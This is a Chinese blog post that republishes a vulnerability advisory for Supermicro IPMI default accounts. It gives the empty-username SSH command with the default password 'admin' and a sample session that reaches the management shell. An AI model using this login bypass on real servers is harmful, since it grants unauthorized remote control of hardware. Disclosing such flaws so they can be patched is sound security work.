Chinaunix首页 | 论坛 | 博客
  • 博客访问: 373548
  • 博文数量: 89
  • 博客积分: 3178
  • 博客等级: 中校
  • 技术积分: 965
  • 用 户 组: 普通用户
  • 注册时间: 2008-07-09 15:31
文章分类

全部博文(89)

文章存档

2013年(10)

2012年(33)

2011年(41)

2008年(5)

分类: 系统运维

2012-02-14 12:04:49

危害
远程攻击者可以利用漏洞未授权访问应用设备。

攻击所需条件
攻击者必须访问Supermicro IPMI。

漏洞信息
Supermicro IPMI是超微产品中的IPMI卡,可远端开机,进入BIOS等进行系统控制。
Supermicro IPMI存在两个管理账户,用于WEB接口访问:
"ADMIN"
"Anonymous"
官方文件仅告诉用户更改"ADMIN"账户密码。
通过SSH指定空用户名,默认密码使用小写的"admin"可绕过限制登录系统。

测试方法
==
$ ssh -l "" -o PreferredAuthentications=password,keyboard-interactive
xx.xx.xx.xx
@xx.xx.xx.xx's password:
Auth User/Pass with PS...pass.
ATEN SMASH-CLP System Management Shell, version 1.00
Copyright (c) 2008-2009 by ATEN International CO., Ltd.
All Rights Reserved
->
==

漏洞消息链接
http://packetstormsecurity.org/files/view/105730/supermicroipmi-default.txt

漏洞消息标题
Supermicro IPMI Default Accounts
 
参考信息
Nessus plugins :51418 51369
22/tcp open ssh Dropbear sshd 0.52 (protocol 2.0)
阅读(3598) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~